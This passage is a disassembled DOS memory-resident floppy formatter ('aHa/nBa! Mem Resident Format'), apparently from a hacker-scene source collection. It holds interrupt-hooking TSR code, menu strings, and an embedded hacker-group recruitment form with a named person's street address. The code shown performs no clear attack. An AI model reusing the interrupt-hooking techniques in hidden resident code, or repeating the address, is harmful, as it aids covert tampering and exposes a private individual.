+data_78 db 0 +data_79 db 0 +data_80 db 0 +data_81 dw 130Dh +data_82 dw 0 +data_84 dw 0 +data_85 dw 0 +data_86 dw 0 +data_87 dw 0 +data_88 dw 0 +data_89 dw 0 +data_90 dw 0 +data_91 dw 0 +data_92 dw 0 +data_93 dw 0 +data_94 db 0 +data_95 db 0 +data_96 db 0Bh +data_97 db 0 +data_98 db 0, 0 +data_99 db 0 +data_100 dw 0 +data_101 db 0 +data_102 db 0 +data_103 db 0 +data_104 db 0 +data_105 dw 0 +data_106 dw 0 +data_107 db 0 +data_108 db 0 +data_109 db 0 +data_110 db 6 +data_111 db 0A0h +data_112 db 0 +data_113 db 0 + db 11 dup (0) +data_115 db 0 + db 9 dup (0) + +ahadisk endp + +; +; SUBROUTINE +; + +sub_2 proc near + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + 
add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+di],al + add [bx],cl + add [bx+di],al + add [bp+si],cl + add [si+0],ah +;* call sub_5 ;* + db 0E8h, 03h, 10h + daa ; Decimal adjust + mov al,byte ptr ds:[4086h] + inc dx + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + ja $+7 ; Jump if above + add [bx+si],al + add [bx+si],al + pop dx + xor ax,355Ah + pop dx + xor ax,577h + add [bx+si],al + +; External Entry into Subroutine + +sub_3: + add [bx+si],al + add [bx+si],al + add [bx+si],al + pop dx + xor ax,0 + add [bx+si],al + add [bx+si],al + pop dx + xor ax,0 + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + pop dx + xor ax,577h + pop dx + xor ax,0 + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add bh,dh +;* pop cs ; Dangerous 8088 only + db 0Fh +;* jo loc_4 ;*Jump if overflow=1 + db 70h,0FFh + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [di+6Eh],al + jz loc_5 ; Jump if zero + jc $+22h ; Jump if carry Set + inc sp + jc $+6Bh ; Jump if carry Set + jbe loc_6 ; Jump if below or = + and [si+6Fh],dl + and [bp+si+65h],al + and [bp+6Fh],al + jc $+6Fh ; Jump if carry Set + db 61h, 74h, 20h, 3Fh, 20h, 5Bh + db 'A' + db 5Dh, 00h + db 'Enter Drive Type ? (0 - 360K, 1 ' + db '- 1.2M) [0]' + db 0 + db 'Enter Drive Type ? 
(0 - 720K,' +loc_5: + and [bx+di],dh + and [di],ch + and [bx+di],dh +loc_6: + db '.44M) [0]' + db 0 + db 'Number Of Diskette To Be Format ' + db '(1-11) [' +data_182 dw 3131h + db 5Dh, 20h, 3Fh, 20h, 00h + db 'Insert New Diskette Into Drive ' +data_183 db 41h + db 0 + db 'Press ENTER To Start Format Or E' + db 'SC To Abort' + db 0 + db 'Can', 27h, 't Release From Memor' + db 'y, Interrupt Vector Address Been' + db ' Changed' + db 0 + db 'Press Any Key To Return To Main ' + db 'Menu' + db 0 + db 'No Format Report !' + db 00h, 00h, 00h, 00h, 00h, 2Dh + db 00h, 00h, 00h, 00h, 00h + db 43h, 70h +data_184 db 'HpApNpGpEpEpRpRpOpRp!pFpIpNpIpSp' + db 'Hp p p', 0 + db 'p', 0 + db 'p p pDisk Not Ready !', 0 + db 'Disk Write Protected !', 0 + db 'Seek Error !', 0 + db 'Abort or Retry ?', 0 + db 'Track 0 Bad, Diskette Unusable !' + db 0 + db 'Program Interrupted !', 0 + db 'Ready Printer, Press ENTER When ' + db 'Ready !', 0 + db 'Printing ....', 0 + db 'I/O Error !', 0 + db 'Printer Not Ready !', 0 + db 0C9h, 01h, 4Eh,0CDh,0BBh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 13h, 20h,0ADh + db 'aHa/nBa!Mem Resident Format ' + db 1, 3 + db ' Version 6.9' + db 01h, 10h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0CCh, 01h + db 4Eh,0CDh,0B9h,0BAh, 01h, 4Eh + db 20h + db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh + db 0BAh, 01h + db 4Eh, 20h + db 0BAh,0C8h, 01h, 4Eh,0CDh,0BCh + db 01h, 87h,0D0h, 1Fh,0C9h, 01h + db 4Eh,0CDh,0BBh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 13h, 20h + db 0ADh + db 'aHa/nBa!Mem Resident Format ' + db 1, 3 + db ' 
Version 6.9' + db 01h, 10h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0CCh, 01h + db 4Eh,0CDh,0B9h,0BAh, 01h, 1Ch + db 20h + db 0DAh, 01h, 15h,0C4h,0BFh, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0B3h + db ' Print Out ' + db 0ADh + db 'aHa/nBa! ' + db 0B3h, 01h, 1Bh, 20h,0BAh,0BAh + db 01h, 1Ch, 20h,0C0h, 01h, 15h + db 0C4h,0D9h, 01h, 1Bh, 20h,0BAh + db 0BAh, 01h, 1Ch, 20h,0DAh, 01h + db 15h,0C4h + db 0BFh, 01h, 1Bh, 20h,0BAh,0BAh + db 01h, 1Ch, 20h,0B3h, 01h, 04h + db ' Start format' + db 01h, 05h, 20h,0B3h, 01h, 1Bh + db 20h,0BAh,0BAh, 01h, 1Ch, 20h + db 0C0h, 01h, 15h,0C4h,0D9h, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0DAh, 01h, 15h,0C4h,0BFh + db 01h, 1Bh, 20h,0BAh,0BAh, 01h + db 1Ch, 20h,0B3h, 01h, 04h + db ' Format report' + db 01h, 04h, 20h,0B3h, 01h, 1Bh + db 20h,0BAh,0BAh, 01h, 1Ch, 20h + db 0C0h, 01h, 15h,0C4h,0D9h, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0DAh, 01h, 15h,0C4h,0BFh + db 01h, 1Bh, 20h,0BAh,0BAh, 01h + db 1Ch, 20h,0B3h + db ' Track display o' +data_187 dw 206Eh + db 20h, 20h,0B3h, 01h, 1Bh, 20h + db 0BAh,0BAh, 01h, 1Ch, 20h,0C0h + db 01h, 15h,0C4h,0D9h, 01h, 1Bh + db 20h,0BAh,0BAh, 01h, 1Ch, 20h + db 0DAh, 01h, 15h,0C4h,0BFh, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0B3h + db ' Release from memory ' + db 0B3h, 01h, 1Bh, 20h,0BAh,0BAh + db 01h, 1Ch, 20h,0C0h, 01h, 15h + db 0C4h,0D9h, 01h, 1Bh, 20h,0BAh + db 0BAh, 01h, 1Ch, 20h,0DAh, 01h + db 15h,0C4h,0BFh, 01h, 1Bh, 20h + db 0BAh,0BAh, 01h, 1Ch, 20h,0B3h + db 01h, 09h, 20h, 45h, 78h, 69h + db 74h, 01h, 08h, 20h,0B3h, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0C0h, 01h, 15h,0C4h,0D9h + db 01h, 1Bh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0C8h, 01h, 4Eh + db 0CDh,0BCh, 01h, 87h,0D0h, 1Fh + db 0C9h, 01h, 4Eh,0CDh,0BBh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 13h, 20h,0ADh + db 'aHa/nBa!Mem Resident Format ' + db 1, 3 + db ' Version 6.9' + db 01h, 10h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0CCh, 01h + db 4Eh + db 0CDh,0B9h,0BAh, 01h, 4Eh, 20h + db 0BAh,0BAh, 01h, 4Eh, 
20h,0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0CCh, 01h + db 17h + db 0CDh,0D1h, 01h, 0Fh,0CDh,0D1h + db 01h, 10h,0CDh,0D1h, 01h, 15h + db 0CDh,0B9h,0BAh, 01h + db 3 + db ' Drive To Be Format ' + db 0B3h, 01h, 03h + db ' Drive Type ' + db 0B3h + db ' Diskette No. ' + db 0B3h + db ' Total Diskette(s) ' + db 0BAh,0C7h, 01h, 17h,0C4h,0C5h + db 01h, 0Fh,0C4h,0C5h, 01h, 10h + db 0C4h,0C5h, 01h, 15h,0C4h,0B6h + db 0BAh, 01h, 0Bh + db 20h +data_188 db 41h + db 01h, 0Bh, 20h,0B3h, 01h, 05h + db 20h +data_189 db 31h + db 2Eh, 34h, 34h, 20h, 4Dh, 01h + db 04h, 20h,0B3h, 01h, 06h + db 20h +data_190 dw 3120h + db 01h, 08h, 20h,0B3h, 01h + db 09h, 20h +data_191 dw 3131h + db 1 + db 0Ah, 20h,0BAh,0C8h, 01h + db 17h,0CDh,0CFh, 01h, 0Fh,0CDh + db 0CFh, 01h, 10h,0CDh,0CFh, 01h + db 15h,0CDh,0BCh, 01h, 87h,0D0h + db 1Fh,0C9h, 01h, 4Eh,0CDh,0BBh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 13h + db ' Background Diskette Formatter S' + db 'tatus Report' + db 01h, 10h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0CCh, 01h, 0Ch,0CDh + db 0D1h + db 01h, 15h,0CDh,0D1h, 01h, 11h + db 0CDh + db 0D1h, 01h, 19h,0CDh,0B9h,0BAh + db ' Diskette ' + db 0B3h, 01h, 07h, 20h, 56h, 6Fh + db 6Ch, 75h, 6Dh, 65h, 01h, 08h + db 20h,0B3h, 01h, 05h, 20h, 4Eh + db 6Fh, 2Eh, 20h, 4Fh, 66h, 01h + db 06h, 20h,0B3h, 01h, 04h + db ' Total Disk Space' + db 01h, 05h, 20h,0BAh,0BAh, 01h + db 05h, 20h, 4Eh, 6Fh, 2Eh, 01h + db 04h, 20h,0B3h, 01h, 04h + db ' Serial Number' + db 01h, 04h, 20h,0B3h + db ' Bad Cluster(s) ' + db 0B3h, 01h + db 8, ' In Bytes' + db 01h, 09h, 20h,0BAh,0C7h, 01h + db 0Ch,0C4h,0C5h, 01h, 15h,0C4h + db 0C5h, 01h, 11h,0C4h,0C5h, 01h + db 
19h,0C4h,0B6h + db 0BAh, 01h, 0Ch, 20h + db 0B3h, 01h, 15h + db 20h,0B3h, 01h, 11h, 20h,0B3h + db 01h, 19h, 20h,0BAh,0BAh, 01h + db 0Ch, 20h,0B3h, 01h, 15h, 20h + db 0B3h, 01h, 11h, 20h,0B3h, 01h + db 19h, 20h,0BAh,0BAh, 01h, 0Ch + db 20h,0B3h, 01h, 15h, 20h,0B3h + db 01h, 11h, 20h,0B3h, 01h, 19h + db 20h,0BAh,0BAh, 01h, 0Ch, 20h + db 0B3h, 01h, 15h, 20h,0B3h, 01h + db 11h + db 20h + db 0B3h, 01h, 19h, 20h,0BAh,0BAh + db 01h, 0Ch, 20h,0B3h, 01h, 15h + db 20h,0B3h, 01h, 11h, 20h,0B3h + db 01h, 19h, 20h,0BAh,0BAh, 01h + db 0Ch, 20h,0B3h, 01h, 15h, 20h + db 0B3h, 01h, 11h, 20h,0B3h, 01h + db 19h, 20h,0BAh,0BAh, 01h, 0Ch + db 20h,0B3h, 01h, 15h, 20h,0B3h + db 01h, 11h, 20h,0B3h, 01h, 19h + db 20h,0BAh,0BAh, 01h, 0Ch, 20h + db 0B3h, 01h, 15h, 20h,0B3h, 01h + db 11h, 20h,0B3h, 01h, 19h, 20h + db 0BAh,0BAh, 01h, 0Ch, 20h,0B3h + db 01h, 15h, 20h,0B3h, 01h, 11h + db 20h,0B3h, 01h, 19h, 20h,0BAh + db 0BAh, 01h, 0Ch, 20h,0B3h, 01h + db 15h, 20h,0B3h, 01h, 11h, 20h + db 0B3h, 01h, 19h, 20h,0BAh,0BAh + db 01h, 0Ch, 20h,0B3h, 01h, 15h + db 20h,0B3h, 01h, 11h, 20h,0B3h + db 01h, 19h, 20h,0BAh,0CCh, 01h + db 0Ch,0CDh,0CFh, 01h, 15h,0CDh + db 0CFh, 01h, 11h,0CDh,0CFh, 01h + db 19h,0CDh,0B9h,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 15h + db 20h, 50h + db 'ress Any Key To Return To Main M' + db 'enu' + db 01h, 15h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0C8h, 01h, 4Eh + db 0CDh,0BCh, 01h, 87h,0D0h, 1Fh + db 0Dh, 0Ah, 0Dh, 0Ah, 20h + db 9 dup (20h) + db 0ADh + db 'aHa/nBa! Application Form! ' + db ' ', 0Dh + db 0Ah, 'What file is this?', 0Dh, 0Ah + db ' Where Did ' + db 'you get it from?', 0Dh, 0Ah, ' ' + db ' Handle:', 0Dh, 0Ah + db ' Phone #:', 0Dh, 0Ah, ' ' + db ' ', 0Dh, 0Ah, ' ' + db ' List 3 boards whe' + db 're you could be reached at: ', 0Dh + db 0Ah, 0Dh, 0Ah, ' ' + db ' Can y' + db 'ou HaCK?', 0Dh, 0Ah, ' ' + db ' List a fe' + db 'w thigs you', 27h, 've hacked:', 0Dh + db 0Ah, 0Dh, 0Ah, ' ' + db ' Ok! 
Send MoneY, pft,' + db ' and this letter to:', 0Dh, 0Ah, ' ' + db ' Psycho', 0Dh + db 0Ah, ' 1340 W Irving', 0Dh + db 0Ah, ' #229', 0Dh, 0Ah, ' ' + db ' Chicago, IL', 0Dh, 0Ah, ' 60' + db '613', 0Dh, 0Ah, ' ' + db ' Ok! No' + db 'w, write about yourself: ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ', 0Ch, 0 + db '.' + db 80h, 3Eh, 2Dh, 02h, 00h, 74h + db 08h, 2Eh,0FEh, 0Eh, 2Dh, 02h + db 0EBh, 09h, 90h + db 2Eh,0F6h, 06h, 2Eh, 02h, 80h + db 75h, 05h +loc_32: + jmp dword ptr cs:[195h] +loc_33: + mov word ptr cs:[1EAh],ax + mov al,0Bh + out 20h,al ; port 20h, 8259-1 int command + jmp short $+2 ; delay for I/O + in al,20h ; port 20h, 8259-1 int IRR/ISR + and al,0FEh + mov ax,word ptr cs:[1EAh] + jz loc_34 ; Jump if zero + jmp short loc_32 +loc_34: + mov word ptr cs:[1FCh],ax + mov word ptr cs:[1FEh],bx + mov word ptr cs:[208h],sp + mov word ptr cs:[20Eh],ss + mov word ptr cs:[20Ch],ds + mov word ptr cs:[210h],es + mov word ptr cs:[20Ah],bp + mov word ptr cs:[204h],si + mov word ptr cs:[206h],di + mov word ptr cs:[200h],cx + mov word ptr cs:[202h],dx + mov ds,word ptr cs:[1E2h] + mov ss,word ptr ds:[1DAh] + mov sp,word ptr ds:[1DCh] + mov es,word ptr ds:[1E4h] + mov bp,word ptr ds:[1E0h] + mov si,word ptr ds:[1D8h] + mov di,word ptr ds:[1DEh] + mov ax,word ptr ds:[1D0h] + mov bx,word ptr ds:[1D2h] + mov cx,word ptr ds:[1D4h] + mov dx,word ptr ds:[1D6h] + jmp dword ptr cs:[195h] + mov word ptr cs:[1F8h],ds + mov word ptr cs:[1F6h],ax + mov word ptr cs:[1FAh],bx + mov ds,cs:data_25 + mov bx,keybd_flags_1_ + mov ah,[bx] + and ah,0Fh + cmp ah,0Bh + jne loc_36 ; Jump if not equal + test byte ptr cs:[22Eh],0C0h + jz loc_35 ; Jump if zero + test 
byte ptr cs:[22Eh],40h ; '@' + jz loc_36 ; Jump if zero + or byte ptr cs:[22Eh],20h ; ' ' + jmp short loc_36 + db 90h +loc_35: + or byte ptr cs:[22Eh],80h +loc_36: + mov ax,word ptr cs:[1F6h] + mov ds,word ptr cs:[1F8h] + mov bx,word ptr cs:[1FAh] + jmp dword ptr cs:[199h] + db 2Eh, 80h, 3Eh, 2Fh, 02h, 00h + db 74h, 0Dh, 2Eh,0C6h, 06h, 2Fh + db 02h, 00h, 50h,0B0h, 66h,0E6h + db 20h, 58h,0CFh +loc_37: + jmp dword ptr cs:[19Dh] + test dl,80h + jnz loc_38 ; Jump if not zero + test byte ptr cs:[22Eh],40h ; '@' + jz loc_38 ; Jump if zero + mov word ptr cs:[1EAh],ax + pop ax + pop ax + pop ax + or ax,1 + push ax + sub sp,4 + mov ax,word ptr cs:[1EAh] + mov ah,80h + iret ; Interrupt return +sub_2 endp + + +; +; SUBROUTINE +; + +sub_6 proc near +loc_38: + jmp dword ptr cs:[1A1h] + mov byte ptr ds:[22Eh],40h ; '@' + call sub_28 + jnc loc_40 ; Jump if carry=0 + clc ; Clear carry flag +loc_39: + call sub_11 + jmp loc_121 +loc_40: + mov ds,data_25 + test byte ptr ds:dsk_motor_stat_,0Fh + push cs + pop ds + jnz loc_39 ; Jump if not zero + call sub_22 + call sub_23 +loc_41: + mov ax,55Ch + mov cs:data_93,ax + call sub_21 + mov data_112,70h ; 'p' + call sub_27 + call sub_13 +loc_42: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + je loc_48 ; Jump if equal + cmp al,0Dh + je loc_49 ; Jump if equal + cmp ah,48h ; 'H' + je loc_50 ; Jump if equal + cmp ah,50h ; 'P' + je loc_53 ; Jump if equal + and al,0DFh + cmp al,50h ; 'P' + je loc_43 ; Jump if equal + cmp al,52h ; 'R' + je loc_47 ; Jump if equal + cmp al,45h ; 'E' + je loc_48 ; Jump if equal + cmp al,53h ; 'S' + je loc_44 ; Jump if equal + cmp al,46h ; 'F' + je loc_45 ; Jump if equal + cmp al,54h ; 'T' + je loc_46 ; Jump if equal + call sub_11 + jmp short loc_42 +loc_43: + jmp loc_137 +loc_44: + jmp short loc_55 + db 90h +loc_45: + jmp loc_145 +loc_46: + jmp loc_149 +loc_47: + jmp loc_151 +loc_48: + jmp loc_154 +loc_49: + mov al,3 + mul data_107 ; ax = data * al + add ax,offset 
loc_43 + jmp ax ;*Register jump +loc_50: + mov data_112,1Fh + call sub_27 + cmp data_107,0 + je loc_52 ; Jump if equal + dec data_107 + sub data_110,3 +loc_51: + mov data_112,70h ; 'p' + call sub_27 + jmp short loc_42 +loc_52: + mov data_107,5 + mov data_110,15h + jmp short loc_51 +loc_53: + mov data_112,1Fh + call sub_27 + cmp data_107,5 + je loc_54 ; Jump if equal + inc data_107 + add data_110,3 + jmp short loc_51 +loc_54: + mov data_107,0 + mov data_110,6 + jmp short loc_51 +loc_55: + call sub_19 + mov data_190,3120h + cmp data_28,1 + jne loc_56 ; Jump if not equal + mov data_29,0 + jmp short loc_60 + db 90h +loc_56: + mov dh,0Dh + mov dl,18h + mov si,232h + call sub_14 + call sub_13 + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + jne loc_57 ; Jump if not equal + jmp loc_41 +loc_57: + cmp al,0Dh + je loc_60 ; Jump if equal + and al,0DFh + sub al,41h ; 'A' + jge loc_59 ; Jump if > or = +loc_58: + call sub_11 + jmp short loc_55 +loc_59: + cmp al,data_28 + jge loc_58 ; Jump if > or = + mov data_29,al + add al,41h ; 'A' + mov byte ptr ds:[24Eh],al ; ('A') + mov data_183,al + mov data_188,al +loc_60: + call sub_19 + call sub_37 + test byte ptr [bx],1 + jz loc_63 ; Jump if zero + mov dh,10h + mov dl,14h + test byte ptr [bx],2 + jnz loc_61 ; Jump if not zero + mov si,251h + jmp short loc_62 + db 90h +loc_61: + mov si,27Eh +loc_62: + call sub_14 + call sub_13 + mov al,31h ; '1' + mov data_102,al + mov al,[si-3] + mov data_103,al + mov data_89,1331h + call sub_16 + and byte ptr [si-3],0FEh + or [si-3],al + xor al,1 + xor data_31,ax +loc_63: + mov ax,data_31 + call sub_39 +loc_64: + call sub_20 + mov dh,0Bh + mov dl,14h + mov si,2ABh + call sub_14 + call sub_38 + cmp data_101,0 + je loc_69 ; Jump if equal + mov ax,word ptr ds:[137h] + mov bx,ax + cmp data_101,1 + jne loc_65 ; Jump if not equal + xchg bh,bl + xor bl,bl ; Zero register + sub al,30h ; '0' + jmp short loc_67 + db 90h +loc_65: + sub al,27h ; ''' + cmp al,0Ah 
+ jg loc_64 ; Jump if > + jz loc_66 ; Jump if zero + xor al,al ; Zero register +loc_66: + sub ah,30h ; '0' + add al,ah + cmp al,0Bh + jg loc_64 ; Jump if > +loc_67: + cmp al,0 + je loc_64 ; Jump if equal + mov data_96,al + or bl,20h ; ' ' + cmp bl,30h ; '0' + jne loc_68 ; Jump if not equal + mov bl,20h ; ' ' +loc_68: + mov data_191,bx + mov data_182,bx +loc_69: + mov data_100,0F5h + mov data_95,0 + mov data_99,0 + call sub_20 + mov dh,0Ah + mov dl,18h + mov si,2DAh + call sub_14 + mov dh,0Ch + mov dl,13h + mov si,2FBh + call sub_14 + call sub_13 +loc_70: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,0Dh + je loc_72 ; Jump if equal + cmp al,1Bh + jne loc_71 ; Jump if not equal + jmp loc_41 +loc_71: + call sub_11 + jmp short loc_70 +loc_72: + mov data_82,1525h + cli ; Disable interrupts + pushf ; Push flags + push cs + mov ax,201h + mov bx,28E9h + mov cx,1 + mov dl,data_29 + xor dh,dh ; Zero register + call sub_6 + jnc loc_78 ; Jump if carry=0 + clc ; Clear carry flag + test ah,80h + jz loc_78 ; Jump if zero + call sub_11 + xor cx,cx ; Zero register + +locloop_73: + loop locloop_73 ; Loop if cx > 0 + + call sub_11 + call sub_56 + call sub_20 + mov dh,0Ah + mov dl,20h ; ' ' + mov si,3DAh + call sub_14 +loc_74: + mov dh,0Eh + mov dl,20h ; ' ' + mov si,40Fh + call sub_14 + call sub_13 +loc_75: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + je loc_77 ; Jump if equal + and al,0DFh + cmp al,52h ; 'R' + jne loc_76 ; Jump if not equal + jmp data_82 +loc_76: + cmp al,41h ; 'A' + je loc_77 ; Jump if equal + call sub_11 + jmp short loc_75 +loc_77: + jmp loc_135 +loc_78: + call sub_24 + call sub_61 + or byte ptr ds:[22Eh],80h + cli ; Disable interrupts + call sub_7 +loc_79: + call sub_52 + call sub_60 + mov data_82,1596h + call sub_64 + test data_73,0C0h + jz loc_80 ; Jump if zero + call sub_64 + test data_73,0C0h + jz loc_80 ; Jump if zero + jmp loc_123 +loc_80: + call sub_74 
+ test data_73,0C0h + jz loc_81 ; Jump if zero + jmp short loc_83 + db 90h +loc_81: + cmp byte ptr ds:[230h],0 + je loc_82 ; Jump if equal + mov ax,word ptr ds:[243Dh] + cmp data_218,ax + jne loc_82 ; Jump if not equal + mov ax,word ptr ds:[243Fh] + cmp data_219,ax + jne loc_82 ; Jump if not equal + jmp loc_117 +loc_82: + cmp byte ptr data_214,0EBh + jne loc_83 ; Jump if not equal + cmp data_217,200h + jne loc_83 ; Jump if not equal + mov data_84,1626h + jmp short loc_84 + db 90h +loc_83: + mov data_84,1623h +loc_84: + call sub_77 + jnc loc_85 ; Jump if carry=0 + jmp loc_123 +loc_85: + test al,40h ; '@' + jz loc_87 ; Jump if zero +loc_86: + mov data_62,3 + jmp loc_125 +loc_87: + mov byte ptr ds:[230h],0 +loc_88: + mov data_82,161Fh +loc_89: + jmp data_84 + call sub_78 + mov data_68,28E9h + mov ax,word ptr data_60 + mov data_67,ax + mov data_69,42h ; 'B' + mov data_70,0E6h + mov data_85,27F1h + call sub_75 + test data_73,0C0h + jz loc_95 ; Jump if zero + test data_74,20h ; ' ' + jz loc_90 ; Jump if zero + cmp data_94,2 + je loc_93 ; Jump if equal + inc data_94 + jmp short loc_91 + db 90h +loc_90: + mov data_94,0 +loc_91: + call sub_65 + test data_73,0C0h + jz loc_92 ; Jump if zero + jmp loc_123 +loc_92: + mov data_84,1623h + jmp short loc_88 +loc_93: + mov data_94,0 + cmp data_65,0 + jne loc_94 ; Jump if not equal + jmp loc_105 +loc_94: + call sub_51 +loc_95: + cmp data_64,0 + jne loc_97 ; Jump if not equal + mov data_64,1 +loc_96: + jmp short loc_89 +loc_97: + call sub_9 + mov data_82,161Fh + mov data_64,0 + inc data_65 + inc data_63 + cmp data_31,0 + jne loc_98 ; Jump if not equal + inc data_63 +loc_98: + call sub_46 + cmp data_63,50h ; 'P' + jge loc_99 ; Jump if > or = + call sub_63 + test data_73,0C0h + jz loc_96 ; Jump if zero + call sub_65 + test data_73,0C0h + jz loc_96 ; Jump if zero + jmp short loc_100 + db 90h +loc_99: + mov data_65,0 + mov data_63,0 + mov data_66,1 + mov data_64,0 + mov data_59,0 + call sub_63 + test data_73,0C0h + jz loc_101 ; Jump if 
zero + call sub_65 + test data_73,0C0h + jz loc_101 ; Jump if zero +loc_100: + mov data_62,40h ; '@' + jmp loc_125 +loc_101: + mov data_82,1712h + call sub_78 + cmp data_64,1 + je loc_102 ; Jump if equal + mov data_64,1 + jmp short loc_101 +loc_102: + call sub_52 + mov ds,data_25 + mov ax,word ptr ds:timer_low_+1 + push cs + pop ds + mov word ptr ds:[243Dh],ax +loc_103: + mov data_82,1738h + mov data_64,0 + mov data_68,2416h + mov data_67,1FFh + mov data_69,4Ah ; 'J' + mov data_70,0C5h + mov data_85,27F1h + call sub_75 + test data_73,0C0h + jz loc_106 ; Jump if zero + test data_74,2 + jz loc_104 ; Jump if zero + jmp loc_86 +loc_104: + cmp data_94,0 + jne loc_105 ; Jump if not equal + inc data_94 + call sub_65 + test data_73,0C0h + jz loc_103 ; Jump if zero + jmp loc_123 +loc_105: + mov data_62,20h ; ' ' + jmp loc_125 +loc_106: + call sub_53 + mov byte ptr ds:[21Ah],2 + mov al,byte ptr ds:[242Bh] + mov data_214,al + mov data_215,0FFFFh + mov word ptr ds:[223h],0 + mov word ptr ds:[21Fh],0 + mov word ptr ds:[212h],139h +loc_107: + mov cx,80h + mov si,word ptr ds:[212h] +loc_108: + mov word ptr ds:[218h],cx + mov word ptr ds:[214h],si + call sub_55 + sub ax,word ptr ds:[21Fh] + test cx,[si] + jz loc_113 ; Jump if zero + cmp ax,200h + jl loc_109 ; Jump if < + mov word ptr 